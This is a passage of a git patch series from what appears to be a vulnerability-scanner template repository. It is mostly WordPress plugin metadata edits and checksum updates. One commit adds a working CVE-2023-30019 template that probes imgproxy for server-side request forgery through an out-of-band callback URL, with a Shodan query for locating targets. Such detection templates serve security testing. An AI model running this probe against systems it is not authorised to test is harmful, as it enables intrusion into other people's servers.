b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 5b57c913b5d6fbec3a8de9a44f403b1837e1d560 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 1 Jul 2023 14:00:50 +0530 Subject: [PATCH 227/609] name -update --- http/cves/2022/CVE-2022-46073.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index a04ec7c33a..340c2afebc 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -1,7 +1,7 @@ id: CVE-2022-46073 info: - name: Reflected Cross Site Scripting + name: Helmet Store Showroom - Cross Site Scripting author: Harsh severity: medium description: | @@ -16,7 +16,8 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,xss + tags: cve,cve2022,xss,helmet-store-showroom + http: - raw: - | From 47c431d8552cd40f8adef6b958cb205f71c3730c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 14:57:30 +0530 Subject: [PATCH 228/609] Create CVE-2023-30019.yaml --- http/cves/2023/CVE-2023-30019.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2023/CVE-2023-30019.yaml diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml new file mode 100644 index 0000000000..479e9b887a --- /dev/null +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-30019 + +info: + name: imgproxy <= 3.14.0 - Server-side request forgery (SSRF) + author: DhiyaneshDK + severity: medium + description: | + imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. + reference: + - https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-918 + metadata: + max-request: 1 + verified: "true" + shodan-query: "Server: imgproxy" + tags: cve,cve2023,imgproxy,ssrf,oast + +http: + - method: GET + path: + - '{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Invalid source image' + + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 422 From a5e5466a67a4723861cc7804652473d49831160b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 10:02:42 +0000 Subject: [PATCH 229/609] Auto Generated New Template Addition List [Sat Jul 1 10:02:42 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d642f0a641..6fbfdf61d8 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/cves/2023/CVE-2023-25346.yaml http/cves/2023/CVE-2023-26842.yaml http/cves/2023/CVE-2023-26843.yaml http/cves/2023/CVE-2023-27372.yaml +http/cves/2023/CVE-2023-30019.yaml http/cves/2023/CVE-2023-31548.yaml http/cves/2023/CVE-2023-33510.yaml http/cves/2023/CVE-2023-34598.yaml From 6468f0b59b8921e7b7eaab8e9845533324bbf982 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 10:03:09 +0000 Subject: [PATCH 230/609] Auto Generated Templates Checksum [Sat Jul 1 10:03:09 UTC 2023] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9d74ab38d5..9ed332d113 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -270,7 +270,7 @@ helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/insert-headers-and-footers.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6 -helpers/wordpress/plugins/iwp-client.txt:e2f2e225c4ff1ca0a8c0083ca61d7e9717bb61d5 +helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/jetpack.txt:d79add1d313daf5c9b7fa689d21d6966e60c2ea0 helpers/wordpress/plugins/kadence-blocks.txt:5ccd149c585cb813fee3007ec54feb05080f7e34 helpers/wordpress/plugins/kirki.txt:2cbc97154c127c59a298a4207a147a2fff01b48f @@ -2285,6 +2285,7 @@ http/cves/2023/CVE-2023-29887.yaml:511453838bafec32940df59bab8e92e1b59e8017 http/cves/2023/CVE-2023-29919.yaml:5442e826890010cd569b2a9fccf8c0cddd908d95 http/cves/2023/CVE-2023-29922.yaml:f89ff2f30ad00b2aaa054e80251634963c175245 http/cves/2023/CVE-2023-29923.yaml:4d983f47537226992d155687473e08c38a096276 +http/cves/2023/CVE-2023-30019.yaml:c22ec20ca13ae9bef095cddbccd7accce7f5ccf7 http/cves/2023/CVE-2023-30210.yaml:d06ef598dd9820bf574d50bd1dd2ee7540295a30 http/cves/2023/CVE-2023-30212.yaml:c677f733ec0e1f1309bf268b63c342ccc264ec9a http/cves/2023/CVE-2023-31059.yaml:9a19a54bbae40949eb308d3d7781a4c2b87aa8c6 @@ -5322,213 +5323,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 -http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb 